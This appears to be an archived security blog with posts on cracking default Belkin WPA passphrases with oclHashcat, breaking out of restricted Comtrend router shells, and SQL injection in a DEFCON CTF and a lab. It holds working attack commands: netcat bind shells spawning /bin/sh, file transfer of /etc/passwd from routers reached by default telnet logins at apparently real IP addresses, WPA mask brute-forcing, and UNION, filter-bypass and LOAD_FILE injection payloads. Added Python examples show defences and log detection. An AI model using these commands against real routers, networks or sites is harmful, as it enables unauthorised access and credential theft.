Some months ago I wrote about default WPS PINs (CVE-2012-6371) in some Belkin routers, after reading another interesting post about how to bruteforce a WiFi network with ESSIDs like belkin.XXXX (CVE-2012-4366). The researchers affirmed that they had found out how to generate the default WPA keys from the MAC address using substitution tables. Surely, if you have enough data, you can figure it out; otherwise it would be pretty interesting to look for it in the firmware. Anyway, in this post I am going to crack an EAPOL+WPA handshake using oclHashcat-plus and maskprocessor.

While I am still trying to figure out how to generate those passphrases, we can demonstrate how weak the passphrases in use are if we use two GPUs such as the HD 7970.

If you are attempting this at home, you will need the following:

  • As many GPUs as you can get (at least one is enough)
  • oclHashcat-plus correctly installed on your machine
  • The aircrack-ng suite
  • Maskprocessor (also from the Hashcat team)
  • A valid handshake from any Belkin WiFi network

First of all, we have to obtain a valid handshake in CAP format. The best way is using aircrack-ng, although you can also do it online at https://hashcat.net/cap2hccap/. Once we have the handshake, if we want to use oclHashcat we must convert it from .cap to .hccap (a special capture format for working with hashcat; please take a look below for further information).

$ aircrack-ng  9944XXYY35A1_belkin-43a2.cap -J belkin
Opening 9944XXYY35A1_belkin-43a2.cap
Read 12517 packets.

   #  BSSID              ESSID                     Encryption

   1  94:44:XX:YY:35:A1  belkin.43a2               EAPOL+WPA (1 handshake)

Choosing first network as target.

Opening 9944XXYY35A1_belkin-43a2.cap
Reading packets, please wait...

Building Hashcat (1.00) file...

[*] ESSID (length: 11): belkin.43a2
[*] Key version: 2
[*] BSSID: 94:44:XX:YY:35:A1
[*] STA: ZZ:WW:71:3D:B9:7A
[*] anonce:
    4A 9B 2F C4 33 6C 35 33 76 83 50 6C F7 17 57 20 
    B4 0C 7A F7 26 E9 5D 6D F2 97 AA 75 3E AE 7F A9 
[*] snonce:
    05 4F 52 A0 18 78 7C E0 07 E8 89 7E ED 99 A1 97 
    1B F8 30 34 3A 4F 14 EC F0 2D D7 72 4D 3A E1 56 
[*] Key MIC:
    6C 33 F8 97 EA 50 E1 DB 16 5B C9 EC 95 7A 99 C7
[*] eapol:
    01 03 00 75 02 01 0A 00 00 00 00 00 00 00 00 00 
    00 05 4F 52 A0 18 78 7C E0 07 E8 89 7E ED 99 A1 
    97 1B F8 30 34 3A 4F 14 EC F0 2D D7 72 4D 3A E1 
    56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC 
    04 01 00 00 0F AC 02 00 00 

Successfully written to belkin.hccap

Quitting aircrack-ng...

(Figure: hccap specs, the WPA capture file format used by hashcat)

Secondly, there are several ways to use oclHashcat to try to crack these networks:

  1. Piping maskprocessor output into oclHashcat via STDIN. (Advantage: on-the-fly, no disk space required. Disadvantage: we cannot watch time, temperature and so on.)
  2. Dictionary attack, creating a wordlist with maskprocessor beforehand. (Advantage: we can watch temperature, time and so on. Disadvantage: some GB of your HDD.)
  3. Bruteforce with -a 3. (Advantage: on-the-fly, no hard disk, no pipes.) (Thanks to philsmd of Hashcat's IRC for that notation.)

I chose the second one, because I like watching the status and, most importantly, I can pause the process when I need to. Anyway, the speed is exactly the same.

After installing maskprocessor, we can get the exact number of combinations if we know the mask of the attack. We know that Belkin is using WPA passphrases of length 8 with the charset lowercase hexadecimal (0-9, a-f). Now we can quickly calculate the possible combinations:

$ ./mp64.bin --custom-charset1=?dabcdef ?1?1?1?1?1?1?1?1 --combinations
4294967296

To save the wordlist we simply redirect the output in a file:

$ time ./mp64.bin --custom-charset1=?dabcdef ?1?1?1?1?1?1?1?1 > ../../../wordlist/WPA/belkin.txt

real    14m15.701s
user    1m25.245s
sys      1m9.252s

$ ls -lah belkin.txt

-rwxrwxrwx 1 root root 36G Jul 29 00:20 belkin.txt

In order to crack the handshake using our wordlist and oclHashcat, we use the following command:

CrackWPAbelkin

 $ ./oclHashcat-plus64.bin -m 2500 --gpu-loops=1024  /tocrack/belkin.hccap /wordlist/WPA/belkin.txt 

Generating dictionary stats for /wordlist/WPA/belkin.txt: 1399569552 bytes (3.62%), 155507728 words, 15550772
Generating dictionary stats for /wordlist/WPA/belkin.txt: 1910789568 bytes (4.94%), 212309952 words, 21230995
Generating dictionary stats for /wordlist/WPA/belkin.txt: 2012405022 bytes (5.21%), 223600558 words, 22360055
Generating dictionary stats for /wordlist/WPA/belkin.txt: 2114020476 bytes (5.47%), 234891164 words, 23489116
Generating dictionary stats for /wordlist/WPA/belkin.txt: 2216683512 bytes (5.73%), 246298168 words, 24629816
<SNIPPED>
Generated dictionary stats for /wordlist/WPA/belkin.txt: 38654705664 bytes, 4294967296 words, 4294967296 keyspace                    

[s]tatus [p]ause [r]esume [b]ypass [q]uit => s
Session.Name...: oclHashcat-plus
Status.........: Running
Input.Mode.....: File (/wordlist/WPA/belkin.txt)
Hash.Target....: belkin.43a2 (94:44:XX:YY:35:a1 <-> WW:ZZ:71:3d:b9:7a)
Hash.Type......: WPA/WPA2
Time.Started...: Mon Jul 29 05:31:56 2013 (12 secs)
Time.Estimated.: Mon Jul 29 10:48:33 2013 (5 hours, 9 mins)
Speed.GPU.#1...:   116.8k/s
Speed.GPU.#2...:   119.2k/s
Speed.GPU.#*...:   236.0k/s
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.......: 2867200/4294967296 (0.07%)
Rejected.......: 0/2867200 (0.00%)
HWMon.GPU.#1...: 97% Util, 46c Temp, 35% Fan
HWMon.GPU.#2...: 97% Util, 41c Temp, 35% Fan

[s]tatus [p]ause [r]esume [b]ypass [q]uit => 

belkin.43a2:648466c7                         

Session.Name...: oclHashcat-plus
Status.........: Cracked
Input.Mode.....: File (/wordlist/WPA/belkin.txt)
Hash.Target....: belkin.43a2 (94:44:XX:YY:35:a1 <-> WW:ZZ:71:3d:b9:7a)
Hash.Type......: WPA/WPA2
Time.Started...: Mon Jul 29 05:31:56 2013 (1 hour, 59 mins)
Speed.GPU.#1...:   118.1k/s
Speed.GPU.#2...:   118.5k/s
Speed.GPU.#*...:   236.7k/s
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 1686405120/4294967296 (39.26%)
Rejected.......: 0/1686405120 (0.00%)
HWMon.GPU.#1...: 87% Util, 76c Temp, 70% Fan
HWMon.GPU.#2...: 92% Util, 64c Temp, 52% Fan

Started: Mon Jul 29 05:31:56 2013
Stopped: Mon Jul 29 07:38:36 2013

The third way, direct brute force. Surely the best:

 ./oclHashcat-plus64.bin -m 2500 --gpu-loops=1024 ../../tocrack/belkin.hccap -a 3 -1 ?dabcdef ?1?1?1?1?1?1?1?1

Finally, we have seen how an attacker could break your security at home. So please, if you have one of these routers, you should:

  1. Disable the WPS feature.
  2. Change the default WPA passphrase for one chosen according to a proper password policy.

I made a video that sums up the process. I hope you enjoy it. I would like to congratulate the Hashcat team for the great tools they make. To be honest, we appreciate them very much.

Or the YouTube video: http://www.youtube.com/watch?v=iyJIwr6Ca3U

Categories: Bruteforce, Wireless Tags:

Comtrends (I) … Got shell?

Monday, 22 July 2013 No comments

Hi everyone, summer has finally arrived, and with it the holidays. I was looking at some Comtrend routers; a couple of years ago my colleague (Mambostar) and I found out how Comtrend was generating WPA keys on some of their routers. They had forgotten to delete /var/md5encode, but we could not use a normal "ls", so we had to find some way of listing the filesystem. This post is the beginning of how to bypass those restrictions, and also covers some methods to get a root shell, a normal shell or a reverse shell. If you know new ones, please add a comment and I'll update this post.

First of all, here is a short summary at the top of the post in case you do not want to read the whole thing.

  • Some ways to get a shell
sh
sysinfo && sh
sysinfo ; sh
echo `command`
cat | sh ( and the command that you wish in the next line)
echo `/bin/sh > /dev/tty`
echo *

  • How can you list files without “ls”?
for v in /* ; do echo $v ; done

  • How can you get a remote shell?

From the router:

cat | sh
/usr/bin/nc -l -p 6666 -e /bin/sh
echo `/usr/bin/nc -l -p 6666 -e /bin/sh`

From your machine/PC:

nc [IProuter] 6666

  • How can you send/receive files?
cat | sh
/usr/bin/nc -l -p 6666 < /etc/passwd
nc [IProuter] 6666 > /etc/passwd

comtrendOScommexec

Several examples on some of the most common Comtrend routers in Spain:

Comtrend BCM96348

dudu@w0rm~:$ telnet 79.148.122.122
Trying 79.148.122.122...
Connected to 79.148.122.122.
Escape character is '^]'.
BCM96348 ADSL Router
Login: 1234
Password: 
> sh
sh: not found
> echo `ls`
echo `ls`: not found
> sysinfo && sh
Number of processes: 34
  9:00pm  up 16 days, 21:00, 
load average: 1 min:0.00, 5 min:0.00, 15 min:0.00
              total         used         free       shared      buffers
  Mem:        13912        13420          492            0          876
 Swap:            0            0            0
Total:        13912        13420          492

BusyBox v1.00 (2009.07.09-10:31+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# exit
> sysinfo ; sh
Number of processes: 34
  9:00pm  up 16 days, 21:00, 
load average: 1 min:0.00, 5 min:0.00, 15 min:0.00
              total         used         free       shared      buffers
  Mem:        13912        13428          484            0          876
 Swap:            0            0            0
Total:        13912        13428          484

BusyBox v1.00 (2009.07.09-10:31+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.

# 
# help

Built-in commands:
-------------------
        . : break cd continue eval exec exit export help login newgrp
        read readonly set shift times trap umask wait [ busybox cat chmod
        date df dmesg echo expr false ifconfig init insmod kill killall
        klogd linuxrc ln logger logread md5sum mkdir mount msh ping ps
        pwd reboot rm rmmod route sendarp sh sysinfo syslogd test tftp
        tftpd top true tty vconfig

# cd /usr/bin
# ls
ls: not found
# for i in * ; do echo $i; done
[
expr
killall
logger
md5sum
test
tftp
top
tty
#

Comtrend BCM96328

dudu@w0rm~:$ telnet 187.218.86.45
Trying 187.218.86.45...
Connected to 187.218.86.45.
Escape character is '^]'.
BCM96328 Broadband Router
Login: admin
Password: 
 > sh
telnetd:error:424.175:processInput:380:unrecognized command sh
 > sysinfo ; sh
Warning: operator ; is not supported!
Number of processes: 56
 11:00pm  up 16 days, 51 min, 
load average: 1 min:0.01, 5 min:0.04, 15 min:0.01
              total         used         free       shared      buffers
  Mem:        60528        35032        25496            0         4232
 Swap:            0            0            0
Total:        60528        35032        25496
 > sysinfo && sh
Warning: operator & is not supported!
Number of processes: 56
 11:00pm  up 16 days, 51 min, 
load average: 1 min:0.01, 5 min:0.04, 15 min:0.01
              total         used         free       shared      buffers
  Mem:        60528        35056        25472            0         4232
 Swap:            0            0            0
Total:        60528        35056        25472
 > sysinfo | sh 
Number: not found
11:00pm: not found
load: not found
total: not found
Mem:: not found
Swap:: not found
Total:: not found
 > echo `ls`
bin data dev etc lib linuxrc mnt opt proc sbin sys tmp usr var webs
 > cat | sh
ls
bin      dev      lib      mnt      proc     sys      usr      webs
data     etc      linuxrc  opt      sbin     tmp      var
pwd
/
cd etc
ls
adsl                gateway.conf        passwd              smb.conf
arl                 group               ppp                 snmp
default.cfg         inetd.conf          pppmsg              soft_bridge
dhcp                init.d              profile             sysmsg
dhcp6c.conf.sample  inittab             psk.txt             udhcpd.conf
dhcp6s.conf.sample  iproute2            racoon.conf         udhcpd.leases
dms.conf            ipsec.conf          radvd.conf.sample   vlan
dyntos.sh           ipv6_start.sample   resolv.conf         wlan
ethertypes          mdk                 rsa_host_key        wrt54g.large.ico
filesystems         modules_install     samba               wrt54g.small.ico
fstab               mtab                services

Spawn a reverse shell

Using a netcat listener we can spawn a shell:

 > cat | sh
ls
bin      dev      lib      mnt      proc     sys      usr      webs
data     etc      linuxrc  opt      sbin     tmp      var
/usr/bin/nc -l -p 6666 -e /bin/sh
 >

From our PC we can connect over netcat:

$ nc  187.218.86.45 6666 
ls
bin
data
dev
etc
lib
linuxrc
mnt
opt
proc
sbin
sys
tmp
usr
var
webs
pwd
/
cat /etc/passwd
admin:PImgkYz1NIYAo:0:0:Administrator:/:/bin/sh
support:GPTPf8y46J5uo:0:0:Technical Support:/:/bin/sh
user:3SPaREpST/DNM:0:0:Normal User:/:/bin/sh
ftpuser:MNhjJatERtE5k:0:0:user for ftp:/:/bin/sh
nobody:L60iAoNSIza8k:0:0:nobody for ftp:/:/bin/sh
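To make clear why these menus fall to `sysinfo && sh`, `echo \`ls\`` or `cat | sh`, here is an added Python simulation (not Comtrend's code; the firmware's real logic is only inferred from the transcripts above). It contrasts a first-word check and a two-operator blacklist, both of which still hand the whole line to a shell, with a dispatcher that refuses shell metacharacters, allowlists the complete command and returns an argv list meant for `subprocess.run(argv)` without a shell. The `ALLOWED` set, the `READABLE` paths and the per-command argument rules are assumptions for the example; nothing in it executes a command.

```python
"""Why a restricted router CLI that hands input to a shell can be escaped.

Added example (not Comtrend's code): a simulation of three ways a telnet
menu might validate a line. The real firmware's logic is only inferred
from the transcripts in the post; ALLOWED, READABLE and the argument
rules are assumptions for the example. Nothing here executes anything.
"""
import ipaddress
import shlex

# Commands the restricted menu is meant to expose (assumed set).
ALLOWED = {"sysinfo", "ping", "ifconfig", "echo", "cat"}

# Characters that let a shell chain, substitute or glob-expand commands.
SHELL_META = set(";&|`$(){}<>*?\n")

# Files the 'cat' command may read (assumed allowlist).
READABLE = {"/proc/uptime", "/proc/meminfo"}


def naive_validate(line):
    """Check only the first word, then (on the real device) pass the whole
    line to the shell. 'sysinfo && sh' passes: the first word is fine and
    the shell honours everything after it."""
    first = line.strip().split(" ", 1)[0]
    return first in ALLOWED


def blacklist_validate(line):
    """What the BCM96328 transcript suggests: refuse ';' and '&', keep the
    shell. Pipes and backticks are not on the list, so 'cat | sh' and
    'echo `ls`' still get through."""
    if ";" in line or "&" in line:
        return False
    return naive_validate(line)


def _is_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


# Per-command argument rules for the strict dispatcher (assumed).
ARG_RULES = {
    "sysinfo": lambda args: not args,
    "ping": lambda args: len(args) == 1 and _is_ip(args[0]),
    "ifconfig": lambda args: len(args) <= 1 and all(a.isalnum() for a in args),
    "echo": lambda args: all(a.replace("_", "").isalnum() for a in args),
    "cat": lambda args: len(args) == 1 and args[0] in READABLE,
}


def strict_parse(line):
    """Allowlist the whole command and never involve a shell.

    Returns the argv list to hand to subprocess.run(argv) (shell=False),
    or None when the line must be rejected. Metacharacters are refused
    before tokenising, the command must be allowlisted, and every
    argument must satisfy that command's rule.
    """
    if any(ch in SHELL_META for ch in line):
        return None
    try:
        argv = shlex.split(line)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    return argv if ARG_RULES[argv[0]](argv[1:]) else None


if __name__ == "__main__":
    for probe in ("sysinfo", "sysinfo && sh", "echo `ls`", "cat | sh", "echo *"):
        print(f"{probe!r:18} naive={naive_validate(probe)!s:5} "
              f"blacklist={blacklist_validate(probe)!s:5} strict={strict_parse(probe)}")
```

The difference is not the length of the blacklist but where the decision is made: as long as the accepted line reaches `sh -c`, every operator the shell knows is an escape route, which is why `|`, backticks and glob expansion (`echo *`) work on the devices above even where `;` and `&` are refused.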

Finally, if you have ideas on how you would do command injection in this kind of router, please feel free to discuss them in the comments.

In the next entry I will discuss some important things about those routers.

Keep hacking! Enjoy the video ;) Can you feel it?

Categories: Networking, Wireless Tags:

Running OclHashcat-plus with 2X hd7970

Tuesday, 2 July 2013 No comments

First of all, if you have not installed the ATI drivers, you can follow this nice wiki from the Hashcat staff:

http://hashcat.net/wiki/doku.php?id=linux_server_howto#install_amd_catalyst

Secondly, if you are having problems, you can read this post:

# List all your cards
$ aticonfig --lsa
* 0. 01:00.0 AMD Radeon HD 7900 Series
  1. 02:00.0 AMD Radeon HD 7900 Series

* - Default adapter

These two commands can be quite useful if you are trying to use both GPU cards and they are not working together, or if you have problems with your graphics on Ubuntu when your PC boots. Even if you have two or more GPU cards and you try to change the DVI adapter, you may see something like "ERROR: clGetDeviceIDs() -1" while being completely sure that your drivers are okay, I mean the correct version of ATI Catalyst for your Hashcat version.

# Grab information with all adapters and it creates a new config file
$ sudo aticonfig --initial -f --adapter=all
$ sudo reboot

Now that the work is done and our 2 cards are working right, we can run a simple example of MD5 cracking with the example files shipped with oclHashcat-plus:

Session.Name...: oclHashcat-plus
Status.........: Exhausted
Input.Base.....: Mask (?a?a?a?a)
Input.Mod......: File (example.dict)
Hash.Target....: File (example0.hash)
Hash.Type......: MD5
Time.Started...: Mon Jul  1 20:31:03 2013 (35 secs)
Time.Estimated.: 0 secs
Speed.GPU.#1...:  3176.6M/s
Speed.GPU.#2...:  2709.5M/s
Speed.GPU.#*...:  5886.1M/s
Recovered......: 2190/6494 (33.72%) Digests, 0/1 (0.00%) Salts
Progress.......: 136302297088/136302297088 (100.00%)
Rejected.......: 1981808640/136302297088 (1.45%)
HWMon.GPU.#1...: 53% Util, 69c Temp, 36% Fan
HWMon.GPU.#2...: 37% Util, 47c Temp, 10% Fan

Started: Mon Jul  1 20:31:03 2013
Stopped: Mon Jul  1 20:31:40 2013

Another thing I did was to set up my conkyrc in order to watch my GPU clocks and other important things like the temperature. Unfortunately, I am not a professional password cracker and I use X11 as well, so my cracking server is quite homemade.

# ATI GPU0
${color orange}HASHCAT${hr 2}$color
GPU${alignr}${execi 1 aticonfig --odgc --odgt --adapter=0  | egrep -i "adapter"| head -n 1}
Graphics Clock${alignr}${execi 1  aticonfig --adapter=0 --od-getclocks |grep Clocks |cut -c 32-34} MHz
Graphics Temperature${alignr}${execi 60  aticonfig --odgc --odgt --adapter=0 | egrep -i  "temperature" | awk '// {print $5}'} °C

# ATI GPU1
GPU${alignr}${execi 1 aticonfig --odgc --odgt --adapter=1  | egrep -i "adapter"| head -n 1}
Graphics Clock${alignr}${execi 1  aticonfig --adapter=1 --od-getclocks |grep Clocks |cut -c 32-34} MHz
Graphics Temperature${alignr}${execi 60  aticonfig --odgc --odgt --adapter=1 | egrep -i  "temperature" | awk '// {print $5}'} °C

Example of conkyrc and hashcat running at the same time

If you want to use something else, you can take a look at my repository on BitBucket.

I read some tips at this link:

http://hashcat.net/forum/thread-1703-post-9707.html

Categories: Bruteforce Tags:

SQLite injection: DEFCON 21 CTF Babyfirst.

Monday, 17 June 2013 No comments

This weekend were the DEFCON CTF quals; unfortunately for students it is not a great time to play CTFs. Anyway, I attempted a simple challenge from the 3dub category (web challenges).

The URL of the challenge was: http://babysfirst.shallweplayaga.me:8041

We could see a simple login with user/password. The first thing to try is a simple bypass.

Username :  ' or '1'='1'-- -

Password  :

And that is the result in the website:

babysfirst

success!

logged in as root

Well, it works, but the flag is not here. I looked at Tamper Data and found this query in the response headers:

X-Sql=select name from users where name = '' or '1'='1' and password = '' or '1'='1' limit 1;

So here we go, but nothing goes right; then we have to guess further information, e.g. whether a UNION works and which database engine it is.

Username :  ' union select 666-- -

Password  :

babysfirst

success!

logged in as 666

Great! We have found the injection point, and we can see the output in the web browser. I tried information_schema for MySQL, all_tables for Oracle and so on, but nothing appeared on the screen. But if we try this SQLite payload...

Username :  ' union SELECT name FROM sqlite_master-- -

Password  :

babysfirst

success!

logged in as keys

And now it is all over with:

Username :   ' union select * from keys-- -

Password  :

babysfirst

success!

logged in as The key is: literally online lolling on line WucGesJi
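To see the bypass and its fix side by side, here is an added Python example (not the challenge's code) using the standard `sqlite3` module. The `users` and `keys` tables and their rows are constructed samples; `login_concat` builds the query by concatenation, reproducing the shape the X-Sql header revealed, and `login_param` binds the same input as parameters, so the `' or '1'='1'` and UNION payloads are compared as plain strings instead of being parsed as SQL.

```python
"""The babysfirst login query, built two ways.

Added example (not the challenge's code) using Python's standard sqlite3
module. The tables and rows are constructed samples that mirror what the
write-up enumerates (a 'users' table and a 'keys' table).
"""
import sqlite3


def make_db():
    """In-memory database with constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (name TEXT, password TEXT);
        INSERT INTO users VALUES ('root', 'constructed-sample-password');
        CREATE TABLE keys (value TEXT);
        INSERT INTO keys VALUES ('constructed-sample-flag');
        """
    )
    return conn


def login_concat(conn, username, password):
    """String-built query, the shape the X-Sql header reveals: the input
    becomes part of the SQL text, so quotes, OR, UNION and the trailing
    comment are all parsed as SQL. Returns the first matching name or None."""
    sql = (
        "SELECT name FROM users WHERE name = '" + username
        + "' AND password = '" + password + "' LIMIT 1"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_param(conn, username, password):
    """Parameterised query: the values travel separately from the SQL text,
    so the same payloads are compared as literal strings and match nothing."""
    row = conn.execute(
        "SELECT name FROM users WHERE name = ? AND password = ? LIMIT 1",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    bypass = "' or '1'='1' -- -"
    list_tables = "' UNION SELECT name FROM sqlite_master -- -"
    print("concat, bypass :", login_concat(db, bypass, ""))       # root
    print("concat, union  :", login_concat(db, list_tables, ""))  # a table name
    print("param,  bypass :", login_param(db, bypass, ""))        # None
    print("param,  valid  :", login_param(db, "root", "constructed-sample-password"))
```

With the concatenated query the `-- -` suffix also swallows the `LIMIT 1`, which is why the UNION variant returns whatever `sqlite_master` holds; with bound parameters neither payload matches a row, and the application would still need to hash the stored passwords, which the challenge's schema evidently did not.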

Categories: SQLinjection Tags:

SQLi II: Writeup MySQL Challenges

Friday, 22 February 2013 No comments

Hi everybody, from now on and maybe in the future I will start writing my posts in English, so you must know that I may make mistakes with the language; anyway I would like to try. All suggestions are welcome.

These are our solutions (mine and @monstruogalleta's) to the security lab on SQL injections. Unfortunately, I cannot say much about the real website, because those challenges may be online again for students. So you can imagine whatever website you like.

Level 0

Hint: A simple login for a banking control panel. Find a way to exploit the authentication method, and find a malformed username/password that is accepted.

In this case we find a POST method, so we will try to bypass it with a simple injection (' or 1=1--). It is very important not to forget the final space in the username field! ;) Most of the time the first user in the database is admin, so we will log in as administrators.

username    :  admin ' OR '1'='1' --
password    :  whatever

Executing query: [SELECT username FROM users WHERE username = 'admin ' OR '1'='1' -- ' AND password = '827ccb0eea8a706c4c34a16891f84e7b']
[+]Correct password! Logged in as root!

[+]The hash to level0 is [65d3289bbf2803f9c20f7fb7c3a019a4ceac719d]

level0

Level 1

Hint: A catalog page for a webshop. Try to inject SQL into the GET-parameter ‘id’, in order to reveal the value of the level hash, stored in the field `level1hash`.`hash`. Hint: a UNION may help you here.

First, we put a quote in the 'id' parameter and we note the output:

http://vulnerable.com:2559/level1/index.php?id='

Error during query: [SELECT id,name,description FROM products WHERE id = ']

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Now we need the number of columns, so we will use ORDER BY to guess the right number. Look at the sequence: when we use 4 it crashes, so we know that 3 is right.

http://vulnerable.com:2559/level1/index.php?id=1%20order%20by%201

http://vulnerable.com:2559/level1/index.php?id=1%20order%20by%202

http://vulnerable.com:2559/level1/index.php?id=1%20order%20by%203

http://vulnerable.com:2559/level1/index.php?id=1%20order%20by%204

Error during query: [SELECT id,name,description FROM products WHERE id = 1 order by 4]

Unknown column '4' in 'order clause'

We can observe that two fields are shown on the screen, so we see that 2 and 3 are displayed:

http://vulnerable.com:2559/level1/index.php?id=NULL%20UNION%20ALL%20SELECT%201,2,3--+

2

3

So we can show on the screen a few important details like:

http://vulnerable.com:2559/level1/index.php?id=NULL%20UNION%20ALL%20SELECT%201,database(),user()--+

level1

level1@localhost

And finally we show the hash from level1hash:

http://vulnerable.com:2559/level1/index.php?id=NULL%20UNION%20SELECT%20NULL,NULL,hash%20FROM%20level1hash%20--+

b1c28c43213b4f8851f7035dbcb868fbb1a68a5a

Level 2

Hint: The same as the previous level, but the administrator has blacklisted SQL keywords like UNION, SELECT and some others… Can you still retrieve the hash?

We simply have to bypass the filter on the UNION and SELECT words, which is easy because it removes each keyword only once:

http://vulnerable.com:2559/level2/index.php?id=NULL%20UNIUNIONON%20SELSELECTECT%20NULL,NULL,hash%20FROM%20level2hash%20--+

a05411cb8da8f1ab143636319c137ceca37e8b16

Level3

Hint: This one takes a different approach, the hash is now no longer located in the database but in a file named ‘keyfile’, located in /var/misc/keyfile. Lucky for you, MySQL offers a great deal of functionality!

Now we have to hex-encode '/var/misc/keyfile' and use LOAD_FILE to read the hash:

http://vulnerable.com:2559/level3/index.php?id=NULL%20UNION%20SELECT%20null,null,LOAD_FILE%280x2f7661722f6d6973632f6b657966696c65%29%20--+

57f3997083012b5321f10b8e18c074be7f655cd5

Level4

Hint: After hiring a ‘security consultant’ Diverse Technologies has patched their catalog webapp, they claim to have applied ‘best practices’ and no longer display the full query. Also, the hash is as of now located in a table with a randomized name. What we know is that the hash is in a field named ‘hash’ and that the table is in the same database as the products table.

We get database() and the number of columns the same way as in the other levels; it is important here to encode level4 as 0x6c6576656c34 (you can use this URL to encode it). With all this, we can now obtain all the random tables using GROUP_CONCAT:

http://vulnerable.com:2559/level4/index.php?id=NULL%20UNION%20SELECT%20null,null,group_concat%28table_name%29,null%20FROM%20information_schema.tables

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,1a02904dff64258ea46e1990c990aa21,3e585ec2eb13b0f7f9086d0d93c991b0,43acbd6d0bc61a214edf761ae318ce94,5d717

But now we add at the end something like: WHERE%20table_schema%20=%200x6c6576656c34

http://vulnerable.com:2559/level4/index.php?id=NULL%20UNION%20SELECT%20null,null,group_concat%28table_name%29,null%20FROM%20information_schema.tables%20WHERE%20table_schema%20=%200x6c6576656c34

1a02904dff64258ea46e1990c990aa21,3e585ec2eb13b0f7f9086d0d93c991b0,43acbd6d0bc61a214edf761ae318ce94,5d717b7af72b4b86b9632444c1039d06,70974c741fae1669397d79e43af0a7a5,7177ebf522f1905c527e12688fa8cd90,826eb56249042782f9faaa7be33c5736,bfc2edd146e21cb352fcc1549efd85f8,products

And now we only have to query each random table for the hash; it can be in the first one or the last, so you try all the tables until you find the right hash and win the level.
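From the defender's side, the requests used in levels 1 to 4 leave recognisable traces in the web server log, and the level 2 filter shows why deleting keywords is not a fix. The following Python is an added example (not part of the lab): the access-log lines are constructed in Apache common log format from the URLs above, `scan_log` URL-decodes each request and matches it against a few signatures (the UNION/SELECT pattern deliberately avoids word boundaries, since `UNIUNIONON` would defeat them), and `strip_once` reproduces a single-pass keyword filter next to a fixed-point version.

```python
"""Log-side detection of the level 1-4 probes, and the level 2 filter flaw.

Added example, not part of the lab: the access-log lines are constructed
in Apache common log format, the detector is a regex scan over the
URL-decoded request target, and strip_once reconstructs what a single-pass
keyword blacklist does to the level 2 payload.
"""
import re
from urllib.parse import unquote_plus

# Signatures for the techniques used in the write-up. The UNION/SELECT
# pattern has no word boundaries on purpose: 'UNIUNIONON SELSELECTECT'
# slips past \bunion\b but not past 'union ... select' within 20 chars.
PROBES = {
    "column-count probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-based extraction": re.compile(r"union.{0,20}select", re.I),
    "schema enumeration": re.compile(r"\binformation_schema\.", re.I),
    "file read": re.compile(r"\bload_file\s*\(", re.I),
    "hex-encoded literal": re.compile(r"\b0x[0-9a-f]{8,}\b", re.I),
}

# Constructed log lines (common log format) built from the URLs in the post.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Feb/2013:10:01:02 +0100] "GET /level1/index.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [22/Feb/2013:10:01:09 +0100] "GET /level1/index.php?id=1%20order%20by%204 HTTP/1.1" 200 233
10.0.0.5 - - [22/Feb/2013:10:01:30 +0100] "GET /level1/index.php?id=NULL%20UNION%20ALL%20SELECT%201,2,3--+ HTTP/1.1" 200 301
10.0.0.5 - - [22/Feb/2013:10:02:11 +0100] "GET /level2/index.php?id=NULL%20UNIUNIONON%20SELSELECTECT%20NULL,NULL,hash%20FROM%20level2hash%20--+ HTTP/1.1" 200 290
10.0.0.5 - - [22/Feb/2013:10:03:40 +0100] "GET /level3/index.php?id=NULL%20UNION%20SELECT%20null,null,LOAD_FILE%280x2f7661722f6d6973632f6b657966696c65%29%20--+ HTTP/1.1" 200 280
10.0.0.5 - - [22/Feb/2013:10:04:02 +0100] "GET /level4/index.php?id=NULL%20UNION%20SELECT%20null,null,group_concat%28table_name%29,null%20FROM%20information_schema.tables%20WHERE%20table_schema%20=%200x6c6576656c34 HTTP/1.1" 200 600
"""

KEYWORDS = ("UNION", "SELECT")


def strip_once(value):
    """Level 2 style filter: delete the occurrences of each keyword in one
    pass. 'UNIUNIONON' loses its inner UNION and becomes 'UNION' again."""
    for kw in KEYWORDS:
        value = re.sub(kw, "", value, flags=re.I)
    return value


def strip_until_stable(value):
    """Repeat until nothing changes. Not the recommended fix (that is a
    parameterised query), but it shows what the fixed-point loop changes."""
    while True:
        new = strip_once(value)
        if new == value:
            return value
        value = new


def decode_request(line):
    """Pull the request target out of a common-log-format line and URL-decode it."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
    return unquote_plus(m.group(1)) if m else ""


def scan_log(text):
    """Return (line number, matched probe names) for each suspicious line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        target = decode_request(line)
        names = [name for name, rx in PROBES.items() if rx.search(target)]
        if names:
            hits.append((n, names))
    return hits


if __name__ == "__main__":
    for n, names in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(names)}")
    print(repr(strip_once("UNIUNIONON SELSELECTECT")))          # 'UNION SELECT'
    print(repr(strip_until_stable("UNIUNIONON SELSELECTECT")))  # ' '
```

Decoding before matching matters: `%20` and `%28` hide `order by` and `LOAD_FILE(` from a scan of the raw line, and the hex-literal signature catches the `0x...` encoding of paths and schema names that the later levels rely on.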

Level5

